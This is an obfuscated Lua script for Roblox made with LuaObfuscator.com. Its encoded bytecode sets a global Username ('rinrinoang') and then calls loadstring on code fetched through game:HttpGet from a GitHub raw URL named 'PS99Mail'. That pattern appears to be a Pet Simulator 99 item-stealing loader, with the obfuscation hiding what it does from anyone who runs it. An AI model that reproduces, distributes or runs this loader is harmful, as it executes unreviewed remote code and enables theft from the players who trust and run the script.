--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==((929 -(214 + 713)) -1)) then return v32;end if ((931 -(857 + 74))==v31) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=569 -(367 + 201) ;end end end v23=nil;function v23()local v33=(117 -(32 + 85)) + 0 ;local v34;local v35;while true do if (v33==(0 + 0 + 0)) then v34,v35=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 0 + 1 ;v33=878 -(282 + 595) ;end if (v33==(1638 -(1523 + 114))) then return (v35 * (1114 -858)) + v34 ;end end end v18=3;end if (v18==4) then function v25()local v36=957 -(892 + (924 -(814 + 45))) ;local v37;local v38;local v39;local v40;local v41;local v42;while true do if (v36==((0 -0) -0)) then v37=v24();v38=v24();v36=1 -(0 + 0) ;end if (v36==1) then v39=1 -(0 + 0) ;v40=(v21(v38,1 -0 ,20) * ((352 -(87 + 263))^(50 -(10 + 8)))) + v37 ;v36=7 -5 ;end if (v36==(183 -(67 + 113))) then if (v41==(0 + (885 -(261 + 624)))) then if (v40==(0 + 0)) then return v42 * ((0 -0) -0) ;else v41=1 + 0 ;v39=0 -(1080 -(1020 + 60)) ;end elseif (v41==(3470 -(630 + 793))) then return ((v40==0) and (v42 * ((431 -(44 + 386))/(952 -(802 + 150))))) or (v42 * NaN) ;end return v8(v42,v41-(2753 -1730) ) * (v39 + (v40/((3 -1)^(43 + 9)))) ;end if (v36==(2 + 0)) then v41=v21(v38,1018 -(915 + 82) ,87 -56 );v42=((v21(v38,19 + (43 -30) )==(1 -0)) and  -(1188 -(1069 + 118))) or 1 ;v36=6 -3 ;end end end v26=nil;function v26(v43)local v44;if  not v43 then v43=v24();if (v43==(0 -0)) then return "";end end v44=v3(v16,v19,(v19 + v43) -(1 + 0) );v19=v19 + v43 ;local v45={};for v68=3 -2 , #v44 do v45[v68]=v2(v1(v3(v44,v68,v68)));end return v6(v45);end v18=5;end if (v18==6) then v29=nil;function v29()local v46=0;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v46~=3) then else v53=nil;while true do local v92=341 -(218 + 123) ;while true do if (v92~=(1582 -(1535 + 46))) then else if (v47==2) then local v107=0;while true do if (v107==(0 + 0)) then for v150=1 + 0 ,v24() do local v151=0;local v152;local v153;local v154;local v155;while true do if (v151==2) then while true do if (v152~=0) then else v153=0;v154=nil;v152=561 -(306 + 254) ;end if (v152~=(1 + 0)) then else v155=nil;while true do if (0~=v153) then else local v166=0 -0 ;while true do if (v166~=0) then else local v167=1467 -(899 + 568) ;while true do if (v167~=1) then else v166=1;break;end if (v167~=(0 + 0)) then else v154=0 -0 ;v155=nil;v167=604 -(268 + 335) ;end end end if (v166==(291 -(60 + 230))) then v153=573 -(426 + 146) ;break;end end end if (v153~=1) then else while true do if (v154~=0) then else v155=v22();if (v21(v155,1 + 0 ,1)==(1456 -(282 + 1174))) then local v169=811 -(569 + 242) ;local v170;local v171;local v172;local v173;local v174;while true do if (v169==(2 -1)) then local v178=0;while true do if (0~=v178) then else v172=nil;v173=nil;v178=1 + 0 ;end if ((1025 -(706 + 318))==v178) then v169=1253 -(721 + 530) ;break;end end end if (v169==0) then v170=0;v171=nil;v169=1272 -(945 + 326) ;end if (v169~=(4 -2)) then else v174=nil;while true do if (v170==(1 + 0)) then local v179=0;local v180;while true do if (v179~=0) then else v180=0;while true do if (0~=v180) then else v173=nil;v174=nil;v180=701 -(271 + 429) ;end if (v180~=1) then else v170=2 + 0 ;break;end end break;end end end if (v170~=0) then else v171=1500 -(1408 + 92) ;v172=nil;v170=1087 -(461 + 625) ;end if (v170~=2) then else while true do if (v171~=2) then else local v181=1288 -(993 + 295) ;local v182;local v183;while true do if (v181==0) then v182=0 + 0 ;v183=nil;v181=1;end if ((1172 -(418 + 753))==v181) then while true do if (v182==(0 + 0)) then v183=0 + 0 ;while true do if (v183~=0) then else local v193=0;while true do if (v193==1) then v183=1;break;end if ((0 + 0)==v193) then if (v21(v173,1,1 + 0 )~=(530 -(406 + 123))) then else v174[2]=v53[v174[2]];end if (v21(v173,2,2)~=(1770 -(1749 + 20))) then else v174[1 + 2 ]=v53[v174[3]];end v193=1;end end end if (v183==(1323 -(1249 + 73))) then v171=2 + 1 ;break;end end break;end end break;end end end if (v171==(1148 -(466 + 679))) then if (v21(v173,6 -3 ,3)==(2 -1)) then v174[1904 -(106 + 1794) ]=v53[v174[4]];end v48[v150]=v174;break;end if (v171==0) then local v185=0 + 0 ;local v186;local v187;while true do if ((1 + 0)~=v185) then else while true do if (v186==0) then v187=0 -0 ;while true do if (v187~=0) then else v172=v21(v155,5 -3 ,3);v173=v21(v155,118 -(4 + 110) ,6);v187=585 -(57 + 527) ;end if (v187~=1) then else v171=1428 -(41 + 1386) ;break;end end break;end end break;end if (v185==0) then v186=103 -(17 + 86) ;v187=nil;v185=1 + 0 ;end end end if (v171==1) then local v188=0;local v189;local v190;while true do if (v188~=(0 -0)) then else v189=0;v190=nil;v188=1;end if (v188~=1) then else while true do if (v189~=(0 -0)) then else v190=166 -(122 + 44) ;while true do if (v190==1) then v171=2;break;end if (v190~=0) then else local v194=0 -0 ;while true do if (v194~=(0 -0)) then else v174={v23(),v23(),nil,nil};if (v172==0) then local v199=0;local v200;local v201;local v202;while true do if (v199~=1) then else v202=nil;while true do if (v200==0) then local v205=0 + 0 ;while true do if (v205~=0) then else v201=0;v202=nil;v205=1 -0 ;end if (v205==(66 -(30 + 35))) then v200=1;break;end end end if (v200~=(1 + 0)) then else while true do if (v201~=0) then else v202=0;while true do if (v202==(1257 -(1043 + 214))) then v174[11 -8 ]=v23();v174[1216 -(323 + 889) ]=v23();break;end end break;end end break;end end break;end if (v199==(0 -0)) then v200=0;v201=nil;v199=581 -(361 + 219) ;end end elseif (v172==(321 -(53 + 267))) then v174[1 + 2 ]=v24();elseif (v172==2) then v174[416 -(15 + 398) ]=v24() -(2^16) ;elseif (v172==3) then local v206=982 -(18 + 964) ;while true do if (v206~=0) then else v174[3]=v24() -((7 -5)^16) ;v174[3 + 1 ]=v23();break;end end end v194=1 + 0 ;end if (v194~=1) then else v190=1;break;end end end end break;end end break;end end end end break;end end break;end end end break;end end break;end end break;end end break;end if (v151==(851 -(20 + 830))) then v154=nil;v155=nil;v151=2;end if (v151~=(0 + 0)) then else v152=126 -(116 + 10) ;v153=nil;v151=1;end end end for v156=1 + 0 ,v24() do v49[v156-(739 -(542 + 196)) ]=v29();end v107=1 -0 ;end if (v107~=(1 + 0)) then else return v51;end end end break;end if (v92==(0 + 0)) then if (v47==(1 + 0)) then local v108=0 -0 ;local v109;while true do if (0~=v108) then else v109=0;while true do if (v109==(2 -1)) then local v158=1551 -(1126 + 425) ;while true do if (1==v158) then v109=2;break;end if (v158==(405 -(118 + 287))) then for v160=3 -2 ,v52 do local v161=0;local v162;local v163;local v164;local v165;while true do if (v161~=(1122 -(118 + 1003))) then else v164=nil;v165=nil;v161=2;end if (v161~=(5 -3)) then else while true do if (v162~=(377 -(142 + 235))) then else local v168=0 -0 ;while true do if (v168==(0 + 0)) then v163=977 -(553 + 424) ;v164=nil;v168=1 -0 ;end if (v168~=(1 + 0)) then else v162=1 + 0 ;break;end end end if (v162==(1 + 0)) then v165=nil;while true do if (v163~=(0 + 0)) then else local v175=0 + 0 ;local v176;while true do if (v175==(0 -0)) then v176=0;while true do if (v176==(0 -0)) then v164=v22();v165=nil;v176=2 -1 ;end if (v176==1) then v163=1 + 0 ;break;end end break;end end end if (v163~=1) then else if (v164==(4 -3)) then v165=v22()~=(753 -(239 + 514)) ;elseif (v164==2) then v165=v25();elseif (v164~=(2 + 1)) then else v165=v26();end v53[v160]=v165;break;end end break;end end break;end if (v161~=0) then else v162=0;v163=nil;v161=1;end end end v51[1332 -(797 + 532) ]=v22();v158=1;end end end if (v109~=(0 + 0)) then else v52=v24();v53={};v109=1 + 0 ;end if (v109==(4 -2)) then v47=2;break;end end break;end end end if (v47==0) then v48={};v49={};v50={};v51={v48,v49,nil,v50};v47=1;end v92=1131 -(369 + 761) ;end end end break;end if (v46~=1) then else v49=nil;v50=nil;v46=2;end if (v46==2) then v51=nil;v52=nil;v46=3;end if (v46==0) then local v91=0;while true do if (v91~=(0 + 0)) then else v47=0;v48=nil;v91=1;end if (v91~=(1 -0)) then else v46=1 -0 ;break;end end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v54,16));if v20 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v85,v20);v20=nil;v97=1;end end else return v85;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + ((182 + 59) -(64 + 174)) );v19=v19 + 1 + 3 ;return (v58 * (24846032 -8068816)) + (v57 * (65872 -(144 + 192))) + (v56 * (472 -(42 + 174))) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v70=v62;local v71=v63;local v72=v64;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v86=0,v78 do if (v86>=v72) then v76[v86-v72 ]=v77[v86 + 1 ];else v80[v86]=v77[v86 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=5) then if (v83<=2) then if (v83<=0) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83==1) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v61;else v80[v82[2]]=v61[v82[3]];end else do return;end end elseif (v83<=3) then local v99=v82[2];local v100=v80[v82[3]];v80[v99 + 1 ]=v100;v80[v99]=v100[v82[4]];elseif (v83==4) then v80[v82[2]]=v82[3];else v80[v82[2]]();end elseif (v83<=8) then if (v83<=6) then v74=v82[3];elseif (v83==7) then v61[v82[3]]=v80[v82[2]];else local v115=v82[2];local v116,v117=v73(v80[v115](v13(v80,v115 + 1 ,v82[3])));v75=(v117 + v115) -1 ;local v118=0;for v133=v115,v75 do v118=v118 + 1 ;v80[v133]=v116[v118];end end elseif (v83<=9) then local v105=v82[2];v80[v105]=v80[v105](v13(v80,v105 + 1 ,v75));elseif (v83>10) then local v119;local v120,v121;local v122;local v123;v61[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v61;else v80[v82[2]]=v61[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v61;else v80[v82[2]]=v61[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v123=v82[2];v122=v80[v82[3]];v80[v123 + 1 ]=v122;v80[v123]=v122[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v123=v82[2];v120,v121=v73(v80[v123](v13(v80,v123 + 1 ,v82[3])));v75=(v121 + v123) -1 ;v119=0;for v136=v123,v75 do v119=v119 + 1 ;v80[v136]=v120[v119];end v74=v74 + 1 ;v82=v70[v74];v123=v82[2];v80[v123]=v80[v123](v13(v80,v123 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];else for v139=v82[2],v82[3] do v80[v139]=nil;end end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67)if v67 then local v89=(v65/(((1663 -(1477 + 184)) + 0)^(v66-(1 + 0))))%(((2051 -545) -(363 + 1141))^(((v67-(1581 -(1183 + 397))) -(v66-(2 -(3 -2)))) + 1 + 0 + 0)) ;return v89-(v89%(1 + 0)) ;else local v90=(1977 -(1913 + 62))^(v66-(1 + (856 -(564 + 292)))) ;return (((v65%(v90 + v90))>=v90) and (2 -1)) or (1933 -(565 + 1368)) ;end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003083O00557365726E616D65030A3O0072696E72696E6F616E67030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012043O00014O000A000100013O00264O0002000100010004063O00020001001204000100013O00262O00010005000100010004063O00050001001204000200033O00120B000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001400010004063O000500010004063O001400010004063O000200012O00023O00017O00",v9(),...);
